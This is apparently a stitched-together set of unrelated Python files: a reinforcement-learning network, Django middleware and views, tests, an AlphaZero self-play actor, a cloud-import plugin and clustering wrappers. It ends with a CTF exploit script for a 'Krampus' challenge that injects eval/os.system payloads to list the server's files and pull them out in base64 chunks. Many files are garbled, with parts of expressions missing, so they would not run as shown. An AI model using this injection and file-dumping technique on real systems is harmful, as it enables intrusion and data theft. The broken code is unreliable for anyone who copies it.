''' This version uses a Q function for PPO, the same that is later used for BCQ ''' import torch import torch.nn as nn import torch.autograd as autograd import torch.nn.functional as F from torch.distributions.categorical import Categorical import random import numpy as np # Function from def init_params(m): classname = m.__class__.__name__ if classname.find("Linear") != -1:, 1) *= 1 / torch.sqrt(, keepdim=True)) if m.bias is not None: class ACModelModularFixed(nn.Module): def __init__( self, input_shape, num_actions, agent_dyn_dict, static_object_dict, target_object_dict, max_modules=0, threshold=0.3, device=torch.device('cuda'), ): super().__init__() self.use_bcq = {} self.threshold = threshold self.device = device if isinstance(max_modules, (int, float)): max_modules = max_modules if max_modules != 0 else np.inf max_modules = [max_modules] * 4 # List of selections of modules per task self.static_object_dict = static_object_dict self.target_object_dict = target_object_dict self.agent_dyn_dict = agent_dyn_dict self.input_shape = input_shape self.num_actions = num_actions self.recurrent = False self.recurrence = 1 self.max_modules = max_modules self.num_modules = max_modules self.sizes = [8, 16, 32, 64] self.num_tasks = 0 # Static object (conv0 and 1) self.static = nn.ModuleList() for i in range(max_modules[0]): self.static.append(nn.Sequential( nn.Conv2d(5, 8, kernel_size=2), nn.ReLU(), nn.MaxPool2d((2, 2)), nn.Conv2d(8, 16, kernel_size=2), nn.ReLU() ).to(self.device)) # Target object (conv2) self.target_pre = nn.ModuleList() self.target_post = nn.ModuleList() for i in range(max_modules[1]): self.target_pre.append(nn.Sequential( nn.Conv2d(1, 8, kernel_size=2), nn.ReLU(), nn.MaxPool2d((2, 2)), nn.Conv2d(8, 16, kernel_size=2), nn.ReLU() ).to(self.device)) self.target_post.append(nn.Sequential( nn.Conv2d(32, 32, kernel_size=2), nn.ReLU() ).to(self.device)) # Agent dynamics (actor, critic) self.agent_pre = nn.ModuleList() for i in range(max_modules[2]): self.agent_pre.append(nn.Sequential( nn.Conv2d(1, 8, kernel_size=2), nn.ReLU(), nn.MaxPool2d((2, 2)), nn.Conv2d(8, 16, kernel_size=2), nn.ReLU(), nn.Conv2d(16, 32, kernel_size=2), nn.ReLU() ).to(self.device)) self.actor_layers = nn.ModuleList() self.critic_layers = nn.ModuleList() for i in range(max_modules[2]): self.actor_layers.append(nn.Sequential( nn.Linear(self.feature_size(), self.sizes[3]), nn.Tanh(), nn.Linear(self.sizes[3], self.num_actions) ).to(self.device)) self.critic_layers.append(nn.Sequential( nn.Linear(self.feature_size(), self.sizes[3]), nn.Tanh(), nn.Linear(self.sizes[3], self.num_actions) ).to(self.device)) # Initialize parameters correctly self.apply(init_params) def features(self, x, task_id): n = x.shape[0] x_static = x[:, :5, :, :] x_target = x[:, 5:6, :, :] x_agent = x[:, 6:, :, :] x_static = self.static[self.static_object_dict[task_id]](x_static) x_target = self.target_pre[self.target_object_dict[task_id]](x_target) x_target =, x_target), dim=1) x_target = self.target_post[self.target_object_dict[task_id]](x_target) x_agent = self.agent_pre[self.agent_dyn_dict[task_id]](x_agent) x_agent =, x_agent), dim=1) return x_agent def fc(self, x, task_id, return_bc=False): if return_bc: x_q = self.critic_layers[self.agent_dyn_dict[task_id]](x) x_bc = self.actor_layers[self.agent_dyn_dict[task_id]](x) return x_q, F.log_softmax(x_bc, dim=1), x_bc x_actor = self.actor_layers[self.agent_dyn_dict[task_id]](x) x_critic = self.critic_layers[self.agent_dyn_dict[task_id]](x).max(dim=1, keepdim=True)[0] return x_actor, x_critic def forward(self, obs, task_id, return_bc=False): x = obs.image.transpose(1, 3).transpose(2, 3) x = self.features(x, task_id) features = x.view(x.size(0), -1) x = self.fc(features, task_id, return_bc) if not return_bc: x_actor, x_critic = x dist = Categorical(logits=F.log_softmax(x_actor, dim=1)) value = x_critic.squeeze(1) return dist, value return x def feature_size(self): x = autograd.Variable(torch.zeros(1, *self.input_shape, device=self.device).transpose(1, 3).transpose(2, 3)) x_static = x[:, :5, :, :] x_target = x[:, 5:6, :, :] x_agent = x[:, 6:, :, :] x_static = self.static[0](x_static) x_target = self.target_pre[0](x_target) x_target =, x_target), dim=1) x_target = self.target_post[0](x_target) x_agent = self.agent_pre[0](x_agent) x_agent =, x_agent), dim=1) return x_agent.reshape(1, -1).size(1) def act(self, state, epsilon, task_id): # with torch.no_grad(): # q_value, bc_prob, _ = self.forward(state, task_id, return_bc=True) # bc_prob = bc_prob.exp() # bc_prob = (bc_prob / bc_prob.max(1, keepdim=True)[0] > self.threshold).float() # q_value = (bc_prob * q_value + (1 - bc_prob) * -1e8) # dist = Categorical(logits=F.log_softmax(q_value, dim=1)) # action = dist.sample() # return action with torch.no_grad(): q_value, bc_prob, _ = self.forward(state, task_id, return_bc=True) bc_prob = bc_prob.exp() bc_prob = (bc_prob / bc_prob.max(1, keepdim=True)[0] > self.threshold).float() q_value = (bc_prob * q_value + (1 - bc_prob) * -1e8) dist = Categorical(logits=F.log_softmax(q_value, dim=1)) action = dist.sample() return action def add_task(self, task_id, static_object, target_object, agent_dyn): self.static_object_dict[task_id] = static_object self.target_object_dict[task_id] = target_object self.agent_dyn_dict[task_id] = agent_dyn self.set_use_bcq(task_id, False) def set_use_bcq(self, task_id, use_bcq=False): self.use_bcq[task_id] = use_bcq def anneal_tau(*args, **kwargs): pass
import asyncio def get_page(self): """ A function which will be monkeypatched onto the request to get the current integer representing the current page. """ try: if self.POST: p = self.POST['page'] else: p = self.GET['page'] if p == 'last': return 'last' return int(p) except (KeyError, ValueError, TypeError): return 1 def pagination_middleware(get_response): if asyncio.iscoroutinefunction(get_response): return AsyncPaginationMiddleware(get_response) return PaginationMiddleware(get_response) class PaginationMiddleware: """ Inserts a variable representing the current page onto the request object if it exists in either **GET** or **POST** portions of the request. """ def __init__(self, get_response): self.get_response = get_response def __call__(self, request): = get_page(request) return self.get_response(request) class AsyncPaginationMiddleware: _is_coroutine = asyncio.coroutines._is_coroutine def __init__(self, get_response): self.get_response = get_response async def __call__(self, request): = get_page(request) return await self.get_response(request) pagination_middleware.async_capable = True
import subprocess import pytest from build.platform.python.tests import testlib PYTHON_VERSIONS = ["2.7", "3.4", "3.5", "3.6"] # 3.7, 3.8 are not runnable @pytest.mark.parametrize("pyver", PYTHON_VERSIONS) def test_version_matched(pyver): testlib.check_python_version(pyver) @pytest.mark.parametrize("pyver", PYTHON_VERSIONS) def test_python_max_unicode_bytes(pyver): cmd = [testlib.get_python_bin(pyver), '-c', 'import sys; print(sys.maxunicode)'] maxunicode = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8') assert int(maxunicode) > 65535, "Found UCS2 build" @pytest.mark.parametrize("pyver", PYTHON_VERSIONS) def test_python_imports(pyver): imports = { "2.7": ['pkg_resources'], "3.4": [], "3.5": ['pkg_resources'], "3.6": [], } for imp in imports[pyver]: subprocess.check_call([testlib.get_python_bin(pyver), '-c', 'import ' + imp])
<reponame>a-rey/aaronmreyes_heroku import decimal import ipaddress import django.http import django.core.cache import app_whoami.models def main(request): """ request handler for '/'. """ # try to get client IP from HTTP header raw_ip = request.META.get('HTTP_X_FORWARDED_FOR', request.META.get('REMOTE_ADDR', None)) if not raw_ip: return django.http.JsonResponse({'error': 'IP header not found'}) # X_FORWARDED_FOR: client1, proxy1, proxy2, ... raw_ip = raw_ip.split(',')[0].strip() if not raw_ip: return django.http.JsonResponse({'error': 'IP header format invalid'}) # try to parse the user IP try: ip = ipaddress.ip_address(raw_ip) results = {'IP': str(ip)} except: return django.http.JsonResponse({'error': 'IP header value invalid'}) # check cache if IP already looked up if int(ip) in django.core.cache.cache: return django.http.JsonResponse(django.core.cache.cache.get(int(ip))) # lookup ASN IP block in database asn_blk = app_whoami.models.AsnBlock.objects.filter( ip_start__lte=decimal.Decimal(int(ip)), ip_end__gte=decimal.Decimal(int(ip)), ipv4=(ip.version == 4) ).values().first() # combine info into one object if asn_blk: results.update(asn_blk) # lookup city IP block city_blk = app_whoami.models.CityBlock.objects.filter( ip_start__lte=decimal.Decimal(int(ip)), ip_end__gte=decimal.Decimal(int(ip)), ipv4=(ip.version == 4) ).values().first() if city_blk: # from city IP block, lookup city location city_loc = app_whoami.models.CityLocation.objects.filter( geoname_id=city_blk['geoname_id'] ).values().first() # combine info into one object if city_loc: results.update(city_loc) results.update(city_blk) # remove backend lookup values from response results.pop('id', None) results.pop('ipv4', None) results.pop('ip_end', None) results.pop('ip_start', None) results.pop('geoname_id', None) # format creation timestamp if 'created_at' in results: results['created_at'] = results['created_at'].strftime('%d %b %Y %H:%M:%S %Z') # change keys to be uppercase results = {k.upper(): v for k, v in results.items()} # store result in cache for a faster hit next lookup request django.core.cache.cache.set(int(ip), results) return django.http.JsonResponse(results)
""" Python 3.9 программа самостоятельной игры агентов текущего и предыдущего покаления программа на Python по изучению обучения с подкреплением - Reinforcement Learning Название файла Version: 0.1 Author: <NAME> Date: 2021-12-23 """ import numpy as np import parl import os from alphazero_agent import create_agent from MCTS import MCTS from Arena import Arena from utils import win_loss_draw @parl.remote_class(wait=False) class Actor(object): def __init__(self, game, args, seed): # инициализация класса np.random.seed(seed) os.environ['OMP_NUM_THREADS'] = "1" = game # экземпляр (объект) класса доски и игры между двумя игроками self.args = args # принимает все аргументы из главной программы # 'master_address': 'localhost:8010', # главный адрес кластера xparl # 'actors_num': 1, # количество удаленных участников # 'numIters': 1, # общее количество итераций # 'numEps': 1, # Количество полных игр с самостоятельной игрой для моделирования во время новой итерации. # 'arenaCompare': 50, # Количество игр, которые нужно сыграть во время игры на арене (питтинг) # 'numMCTSSims': 800, # Количество игровых ходов для моделирования MCTS. # 'updateThreshold': 0.8, # пороговое или большее количество игр # 'cpuct': 4, # CPUCT parameter # 'dirichletAlpha': 1.0, # альфа-параметр шума дирихле # 'numItersForTrainExamplesHistory': 20, # история примеров из последних итераций # 'checkpoint': './saved_model/', # папка для сохранения моделей и обучающих примеров # neural network of previous generation # нейронная сеть предыдущего поколения self.previous_agent = create_agent(, cuda=False) # neural network of current generation # нейронная сеть текущего поколения self.current_agent = create_agent(, cuda=False) # MCTS of previous generation # MCTS предыдущего поколения self.previous_mcts = MCTS(, self.previous_agent, self.args, dirichlet_noise=True) # MCTS of current generation # MCTS текущего поколения self.current_mcts = MCTS(, self.current_agent, self.args, dirichlet_noise=True) def self_play(self, current_weights, game_num): """ Сбор данных о тренировках путем самостоятельной игры. Аргументы: current_weights (numpy.array): последние веса нейронной сети game_num (int): номер игры для самостоятельной игры Возврат: train_examples (список): примеры формы (canonicalBoard, currPlayer, pi, v) """ print('Самостоятельная игра одного из созданных агентов (использует одно ядро)') # update weights of current neural network with latest weights # обновить веса текущей нейронной сети с последними весами self.current_agent.set_weights(current_weights) train_examples = [] # создаем пустую таблицу (список) тренировки for _ in range(game_num): print('Начинается игра №', _) # reset node state of MCTS print('сбросить состояние узла MCTS') self.current_mcts = MCTS(, self.current_agent, self.args, dirichlet_noise=True) print('тренировка узла MCTS') train_examples.extend(self._executeEpisode()) # _executeEpisode() - функция одной игры return train_examples def pitting(self, previous_weights, current_weights, games_num): """Борьба между агентом предыдущего поколения и агентом текущего поколения Аргументы: previous_weights (numpy.array): веса нейронной сети предыдущего поколения current_weights (numpy.array): веса нейронной сети текущего поколения game_num (int): количество боев в игре Возврат: кортеж из (номер игры, в которой выиграл предыдущий агент, номер игры, в которой выиграл текущий агент, номер игры, в которой был проведен розыгрыш) """ print('Борьба') # update weights of previous and current neural network # обновить веса предыдущей и текущей нейронной сети self.previous_agent.set_weights(previous_weights) self.current_agent.set_weights(current_weights) # reset node state of MCTS # сбросить состояние узла MCTS print('сбросить состояние узла MCTS перед ареной') self.previous_mcts = MCTS(, self.previous_agent, self.args) self.current_mcts = MCTS(, self.current_agent, self.args) arena = Arena( lambda x: np.argmax(self.previous_mcts.getActionProb(x, temp=0)), lambda x: np.argmax(self.current_mcts.getActionProb(x, temp=0)), previous_wins, current_wins, draws = arena.playGames(games_num) return (previous_wins, current_wins, draws) # возвращает количество предудущих побед, текущих побед и ничьих def evaluate_test_dataset(self, current_weights, test_dataset): """ Оценить эффективность новейших нейронных сетей Аргументы: current_weights (numpy.array): последние веса нейронной сети test_dataset (список): номер игры для самостоятельной игры Возврат: кортеж из (количество совершенных ходов, количество хороших ходов) """ print('Эволюция') # update weights of current neural network with latest weights # обновить веса текущей нейронной сети с последними весами self.current_agent.set_weights(current_weights) # определяем качество проведенной игры perfect_move_count, good_move_count = 0, 0 for data in test_dataset: self.current_mcts = MCTS(, self.current_agent, self.args) # обращаемся к дереву MCTS x =['board'], data['player']) agent_move = int(np.argmax(self.current_mcts.getActionProb(x, temp=0))) # количество ходов moves = data["move_score"] # список очков perfect_score = max(moves) # определяем максимальное значение в списке очков perfect_moves = [i for i in range(7) if moves[i] == perfect_score] # выбираем 7 лучших if agent_move in perfect_moves: perfect_move_count += 1 # подсчет идеальных ходов print('perfect_move_count', perfect_move_count) print('Определяем победа\пройгрыш\ничья - ', win_loss_draw(moves[agent_move])) if win_loss_draw(moves[agent_move]) == win_loss_draw(perfect_score): good_move_count += 1 # подсчет хороших ходов print('good_move_count', good_move_count) return (perfect_move_count, good_move_count) def _executeEpisode(self): # функция одной игры """ Эта функция выполняет один эпизод самостоятельной игры, начиная с игрока 1. По ходу игры каждый ход добавляется в качестве обучающего примера к trainExamples. Игра длится до конца. После игры заканчивается, результат игры используется для присвоения значений каждому примеру в поезде Примеры. Он использует temp = 1, если episodeStep <tempThresholdStep, и после этого использует temp = 0. Возврат: trainExamples: список примеров формы (canonicalBoard, currPlayer, pi, v) pi - вектор политики, проинформированный MCTS, v - +1, если игрок в конце концов выиграл игру, иначе -1. """ print('Эпизод одной игры') trainExamples = [] board = self.curPlayer = 1 episodeStep = 0 while True: episodeStep += 1 print('Самостоятельная игра агентов текущего поколения и предыдущего, ход = ', episodeStep) canonicalBoard =, self.curPlayer) temp = int(episodeStep < self.args.tempThresholdStep) pi = self.current_mcts.getActionProb(canonicalBoard, temp=temp) sym =, pi) for b, p in sym: # board, pi trainExamples.append([b, self.curPlayer, p, None]) action = np.random.choice(len(pi), p=pi) board, self.curPlayer = board, self.curPlayer, action) r =, self.curPlayer) if r != 0: return [(x[0], x[2], r * ((-1)**(x[1] != self.curPlayer))) for x in trainExamples]
# ***************************************************************** # Copyright 2013 MIT Lincoln Laboratory # Project: SPAR # Authors: SY # Description: Section class # # # Modifications: # Date Name Modification # ---- ---- ------------ # 19 Sep 2013 SY Original version # ***************************************************************** # SPAR imports: import spar_python.report_generation.ta1.ta1_section as section import spar_python.report_generation.common.regression as regression import spar_python.report_generation.common.latex_classes as latex_classes import spar_python.report_generation.ta1.ta1_schema as t1s import spar_python.report_generation.ta1.ta1_analysis_percentiles as percentiles import spar_python.report_generation.ta1.ta1_analysis_input as t1ai class Ta1PercentilesSection(section.Ta1Section): """The percentiles section of the TA1 report""" def _store_query_percentiles_table(self): """Stores the LaTeX string representing the query percentiles table on the output object.""" constraint_list = self._config.get_constraint_list( require_correct=True) categories = self._config.results_db.get_unique_query_values( simple_fields=[(t1s.DBF_TABLENAME, t1s.DBF_NUMRECORDS), (t1s.DBF_TABLENAME, t1s.DBF_RECORDSIZE), (t1s.DBP_TABLENAME, t1s.DBP_SELECTIONCOLS), (t1s.DBF_TABLENAME, t1s.DBF_CAT)], constraint_list=constraint_list) # create the percentiles table: caption = "Number of Percentiles passing the $%s+%sx$ requirement" % ( str(self._config.a_req), str(self._config.b_req)) percentiles_table = latex_classes.LatexTable( caption, "perc_main", ["DBNR", "DBRS", "Select", "Query Type", "Num Passing $\%$iles"]) # compute number of percentiles met for every query category: for (dbnr, dbrs, selection_cols, query_cat) in categories: inp = t1ai.Input() inp[t1s.DBF_CAT] = query_cat inp[t1s.DBF_NUMRECORDS] = dbnr inp[t1s.DBF_RECORDSIZE] = dbrs inp[t1s.DBP_SELECTIONCOLS] = selection_cols performer_constraint_list = self._config.get_constraint_list( usebaseline=False) + inp.get_constraint_list() baseline_constraint_list = self._config.get_constraint_list( usebaseline=True) + inp.get_constraint_list() percentile_getter = percentiles.Ta1PercentileGetter( self._config.results_db, performer_constraint_list, baseline_constraint_list) if percentile_getter.has_values(): all_met = percentile_getter.get_all_met( self._config.a_req, self._config.b_req) percentiles_table.add_content([ inp.test_db.get_db_num_records_str(), inp.test_db.get_db_record_size_str(), selection_cols, query_cat, len(all_met)]) self._outp["query_percentiles_table"] = percentiles_table.get_string() def _populate_output(self): """Populates the output object which is passed to the Jinja tempalte in get_string.""" self._store_query_percentiles_table()
import json import uuid from jsonfield import JSONField from django.db import models class Uploadable(models.Model): id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) url = models.URLField(default="") meta_data = JSONField(blank=True, null=True) class Meta: abstract = True # MODEL PROPERTIES @property def file_type(self): if self.meta_data and isinstance(self.meta_data, str): self.meta_data = json.loads(self.meta_data) try: return self.meta_data.get('type', "") if self.meta_data else "" except: return "" @property def name(self): if self.meta_data and isinstance(self.meta_data, str): self.meta_data = json.loads(self.meta_data) return self.meta_data.get('name', "") if self.meta_data else "" @property def file_extension(self): if self.meta_data and isinstance(self.meta_data, str): self.meta_data = json.loads(self.meta_data) return self.meta_data.get('ext', "") if self.meta_data else "" @property def link_title(self): if title = elif 'etc' in self.meta_data: title = (self.meta_data['etc'] or "").upper() else: title = (self.meta_data['type'] or "").upper() if 'type' in self.meta_data else "" if 'ext' in self.meta_data: title = title + " .%s" % (self.meta_data['ext'] or "").upper() return title
import numpy as np import pandas as pd import pytest from sklearn.linear_model import LinearRegression from sklearn.linear_model import TheilSenRegressor from etna.analysis import get_residuals from etna.analysis import plot_residuals from etna.analysis import plot_trend from etna.analysis.plotters import _get_labels_names from etna.datasets import TSDataset from etna.metrics import MAE from etna.models import LinearPerSegmentModel from etna.pipeline import Pipeline from etna.transforms import BinsegTrendTransform from etna.transforms import LagTransform from etna.transforms import LinearTrendTransform from etna.transforms import STLTransform from etna.transforms import TheilSenTrendTransform @pytest.fixture def residuals(): timestamp = pd.date_range("2020-01-01", periods=100, freq="D") df = pd.DataFrame( { "timestamp": timestamp.tolist() * 2, "segment": ["segment_0"] * len(timestamp) + ["segment_1"] * len(timestamp), "target": np.arange(len(timestamp)).tolist() + (np.arange(len(timestamp)) + 1).tolist(), } ) df_wide = TSDataset.to_dataset(df) ts = TSDataset(df=df_wide, freq="D") forecast_df = ts[timestamp[10:], :, :] forecast_df.loc[:, pd.IndexSlice["segment_0", "target"]] = -1 forecast_df.loc[:, pd.IndexSlice["segment_1", "target"]] = 1 residuals_df = ts[timestamp[10:], :, :] residuals_df.loc[:, pd.IndexSlice["segment_0", "target"]] += 1 residuals_df.loc[:, pd.IndexSlice["segment_1", "target"]] -= 1 return residuals_df, forecast_df, ts def test_get_residuals(residuals): """Test that get_residuals finds residuals correctly.""" residuals_df, forecast_df, ts = residuals actual_residuals = get_residuals(forecast_df=forecast_df, ts=ts) assert actual_residuals.to_pandas().equals(residuals_df) def test_get_residuals_not_matching_lengths(residuals): """Test that get_residuals fails to find residuals correctly if ts hasn't answers.""" residuals_df, forecast_df, ts = residuals ts = TSDataset(df=ts[ts.index[:-10], :, :], freq="D") with pytest.raises(KeyError): _ = get_residuals(forecast_df=forecast_df, ts=ts) def test_get_residuals_not_matching_segments(residuals): """Test that get_residuals fails to find residuals correctly if segments of dataset and forecast differ.""" residuals_df, forecast_df, ts = residuals columns_frame = forecast_df.columns.to_frame() columns_frame["segment"] = ["segment_0", "segment_3"] forecast_df.columns = pd.MultiIndex.from_frame(columns_frame) with pytest.raises(KeyError, match="Segments of `ts` and `forecast_df` should be the same"): _ = get_residuals(forecast_df=forecast_df, ts=ts) def test_plot_residuals_fails_unkown_feature(example_tsdf): """Test that plot_residuals fails if meet unknown feature.""" pipeline = Pipeline( model=LinearPerSegmentModel(), transforms=[LagTransform(in_column="target", lags=[5, 6, 7])], horizon=5 ) metrics, forecast_df, info = pipeline.backtest(ts=example_tsdf, metrics=[MAE()], n_folds=3) with pytest.raises(ValueError, match="Given feature isn't present in the dataset"): plot_residuals(forecast_df=forecast_df, ts=example_tsdf, feature="unkown_feature") @pytest.mark.parametrize( "poly_degree, trend_transform_class", ( [1, LinearTrendTransform], [2, LinearTrendTransform], [1, TheilSenTrendTransform], [2, TheilSenTrendTransform], ), ) def test_plot_trend(poly_degree, example_tsdf, trend_transform_class): plot_trend(ts=example_tsdf, trend_transform=trend_transform_class(in_column="target", poly_degree=poly_degree)) @pytest.mark.parametrize("detrend_model", (TheilSenRegressor(), LinearRegression())) def test_plot_bin_seg(example_tsdf, detrend_model): plot_trend(ts=example_tsdf, trend_transform=BinsegTrendTransform(in_column="target", detrend_model=detrend_model)) @pytest.mark.parametrize("period", (7, 30)) def test_plot_stl(example_tsdf, period): plot_trend(ts=example_tsdf, trend_transform=STLTransform(in_column="target", period=period)) @pytest.mark.parametrize( "poly_degree, expect_values, trend_class", ( [1, True, LinearTrendTransform], [2, False, LinearTrendTransform], [1, True, TheilSenTrendTransform], [2, False, TheilSenTrendTransform], ), ) def test_get_labels_names_linear_coeffs(example_tsdf, poly_degree, expect_values, trend_class): ln_tr = trend_class(in_column="target", poly_degree=poly_degree) example_tsdf.fit_transform([ln_tr]) segments = example_tsdf.segments _, linear_coeffs = _get_labels_names([ln_tr], segments) if expect_values: assert list(linear_coeffs.values()) != ["", ""] else: assert list(linear_coeffs.values()) == ["", ""]
<filename>tests/ # -*- coding: utf-8 -*- import pandas as pd import lightkurve as lk from chronos.k2 import K2, Everest, K2sff EPICID = 211916756 # k2-95 CAMPAIGN = 5 # or 18 def test_k2_attributes(): """ """ # test inherited attributes s = K2(epicid=EPICID, campaign=CAMPAIGN) assert s.epicid is not None assert s.target_coord is not None gaia_params = s.query_gaia_dr2_catalog(return_nearest_xmatch=True) assert isinstance(gaia_params, pd.Series) tic_params = s.query_tic_catalog(return_nearest_xmatch=True) assert isinstance(tic_params, pd.Series) def test_k2_lc_pipeline(): s = K2(epicid=EPICID, campaign=CAMPAIGN) s.get_lc("sap") assert isinstance(s.lc_sap, lk.LightCurve) s.get_lc("pdcsap") assert isinstance(s.lc_pdcsap, lk.LightCurve) # def test_k2_lc_custom(): # s = K2(epicid=EPICID, campaign=CAMPAIGN) # sap = s.make_custom_lc() def test_k2_tpf(): s = K2(epicid=EPICID, campaign=CAMPAIGN) tpf = s.get_tpf() assert isinstance(tpf, lk.targetpixelfile.TargetPixelFile) def test_everest(): """ """ s = Everest(epicid=EPICID, campaign=CAMPAIGN) assert isinstance(s.lc_everest, lk.LightCurve) def test_k2sff(): """ """ s = K2sff(epicid=EPICID, campaign=CAMPAIGN) assert isinstance(s.lc_k2sff, lk.LightCurve)
# Check from urllib.parse import urlparse from os import path from plugins.cloudimport.cloud_platform import File, Folder from plugins.cloudimport.extensions.cloud_library import CloudLibrary class Platform(CloudLibrary): def __init__(self): super().__init__('Piwigo', 'http://{server_url}/index.php?/category/{category_id}') # Cloud Platform def platform_file_processing(self, files): # Piwigo has the concept of physical albums, that basically expose the actual folders in the file system. # So it might happen that if the File Uploader plugin is used for GCP files, that the files will need to be renamed to store multiple GCP files. # So basically we are taking any file that contains the string 'gcp_list' and has the extension '.txt' and rename it to 'gcp_list.txt' return [self._map_gcp_file_if_necessary(file) for file in files] def get_server_and_folder_id_from_url(self, url): parse_result = urlparse(url) paths = parse_result.query.split('/') if not 'category' in paths or paths.index('category') >= len(paths) - 1: raise Exception('Wrong URL format') else: category_id = paths[paths.index('category') + 1] path = parse_result.path if not 'index.php' in path: raise Exception('Wrong URL format') path = path[0:path.index('index.php')] server = parse_result.scheme + '://' + parse_result.netloc + '/' + path return server, category_id def build_folder_api_url(self, server_url, folder_id): return '{server_url}/ws.php?format=json&method=pwg.categories.getList&cat_id={folder_id}&recursive=false'.format(server_url = server_url, folder_id = folder_id) def parse_payload_into_folder(self, payload): result = payload['result']['categories'][0] return Folder(result['name'], result['url'], result['nb_images']) def build_list_files_in_folder_api_url(self, server_url, folder_id): # ToDo: add pagination return '{server_url}/ws.php?format=json&method=pwg.categories.getImages&cat_id={folder_id}&recursive=false&per_page=500'.format(server_url = server_url, folder_id = folder_id) def parse_payload_into_files(self, payload): result = payload['result'] return [File(image['file'], image['element_url']) for image in result['images']] def _map_gcp_file_if_necessary(self, file): _, file_extension = path.splitext( if file_extension.lower() == ".txt" and 'gcp_list' in return File('gcp_list.txt', file.url, file.other) return file # Cloud Library def build_folder_list_api_url(self, server_url): return '{}/ws.php?format=json&method=pwg.categories.getList&recursive=true&tree_output=true'.format(server_url) def parse_payload_into_folders(self, payload): categories = payload['result'] return self._flatten_list([self._build_category(cat) for cat in categories]) def _build_category(self, category): name = category['name'] images = category['nb_images'] url = category['url'] subcategories = self._flatten_list([self._build_category(subcat) for subcat in category['sub_categories']]) if category['nb_categories'] > 0 else [] for subcategory in subcategories: = name + ' > ' + folder = [Folder(name, url, images)] if images > 0 else [] return folder + subcategories def _flatten_list(self, list_of_lists): return [item for sublist in list_of_lists for item in sublist]
from abc import ABC import numpy as np from sklearn.cluster import DBSCAN, KMeans from typing import Callable, Optional, Union class BaseClusterer(ABC): """Abstract base class for Clusterers.""" def __call__(self, data: np.ndarray) -> np.ndarray: pass class DbscanClusterer(BaseClusterer): """DBSCAN clustering technique. Args: Reference: """ def __init__(self, eps: float = 0.5, min_samples: int = 5, metric: Union[str, Callable] = "euclidean", metric_params: Optional[dict] = None, algorithm: str = "auto", leaf_size: int = 30, p: Optional[float] = None) -> None: self._clusterer = DBSCAN(eps=eps, min_samples=min_samples, metric=metric, metric_params=metric_params, algorithm=algorithm, leaf_size=leaf_size, p=p, n_jobs=None) def __call__(self, data: np.ndarray) -> np.ndarray: return self._clusterer.fit_predict(data) class KmeansClusterer(BaseClusterer): """KMeans clustering technique. Args: Reference: """ def __init__(self, n_clusters: int = 8, init: Union[str, np.ndarray] = "k-means++", n_init: int = 10, max_iter: int = 300, tol: float = 1e-4, precompute_distances: Union[str, bool] = "auto", verbose: int = 0, random_state: Union[int, None] = None, copy_x: bool = True, algorithm: str = "auto") -> None: self._clusterer = KMeans(n_clusters=n_clusters, init=init, n_init=n_init, max_iter=max_iter, tol=tol, precompute_distances=precompute_distances, verbose=verbose, random_state=random_state, copy_x=copy_x, algorithm=algorithm, n_jobs=None) def __call__(self, data: np.ndarray) -> np.ndarray: return self._clusterer.fit_predict(data)
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from karborclient.common import base class Service(base.Resource): def __repr__(self): return "<Service %s>" % self._info class ServiceManager(base.ManagerWithFind): resource_class = Service def enable(self, service_id): """Enable the service specified by the service ID :param service_id: The ID of the service to enable. """ body = { 'status': 'enabled' } return self._update('/os-services/%s' % service_id, body, "service") def disable(self, service_id): """Disable the service specified by the service ID. :param service_id: The ID of the service to disable. """ body = { 'status': 'disabled' } return self._update('/os-services/%s' % service_id, body, "service") def disable_log_reason(self, service_id, reason): """Disable the service with a reason. :param service_id: The ID of the service to disable. :param reason: The reason for disabling a service. """ body = { 'status': 'disabled', 'disabled_reason': reason } return self._update("/os-services/%s" % service_id, body, "service") def list(self, host=None, binary=None): """Lists all services.""" search_opts = { 'host': host, 'binary': binary } resource_type = "os-services" url = self._build_list_url(resource_type, search_opts=search_opts) return self._list(url, 'services')
<filename>XMAS2018/Krampus/ python from pwn import * import base64 import sys def convertstr(convert, debug=False): if debug: print convert output = "" for i in convert: output+= "chr(%d)+" % ord(i) return output[:-1] if len(sys.argv) == 2 and sys.argv[1] == "local": r = remote("",2000) else: r = remote("",14000) for i in range(5): r.readuntil("<You>:") r.sendline("1") def dump(): payload_search = convertstr("__import__('os').system('find -follow')") r.sendline("eval(%s)"%payload_search) r.readuntil("Krampus>: ") skip = ["./server.jar"] lines = r.readuntil("You>: ")[:-10].splitlines() print "Found %d files" % len(lines) for f in lines: print "Downloading file %s" % f if f in skip: print "Banned file... Skipping" continue if os.path.isfile("./minecraft/%s" % f): print "File already downloaded..." continue payloadchunksize = convertstr("__import__('os').system('cat ./%s | base64 -w 0 | wc -c')" % f) r.sendline("eval(%s)"%payloadchunksize) r.readuntil("Krampus>: ") chunk_size = (r.readuntil("You>: ")[:-9]) print "SIZE: %s" % chunk_size if "Krampus stares back" in chunk_size: print "Found directory..." dirpath = "./minecraft/%s" % f if not os.path.exists(dirpath): os.mkdir(dirpath) print "Directory created" continue else: chunk_size = int(chunk_size) #This is the ugliest code i have ever seen. That's right. I wonder who wrote it chunk_ = range(1, chunk_size+1) n = 50000 output = [chunk_[i:i+n] for i in range(0, len(chunk_), n)] print "Size of file is %d lines" % chunk_size counter = 1 data = "" for i in output: diff = (i[-1]-i[0])+1 print "Processing chunk [%d of %d]" % (counter,chunk_size) high = counter+diff payload = convertstr("__import__('os').system('cat %s | base64 -w 0 | cut -c%d-%d && echo stop')" % (f, counter,high)) counter += diff+1 r.sendline("eval(%s)" % payload) r.readuntil("Krampus>: ") data += r.readuntil("stop")[:-5] data = base64.b64decode(data) with open('minecraft/%s' % f, 'w') as the_file: the_file.write(data) dump() r.close
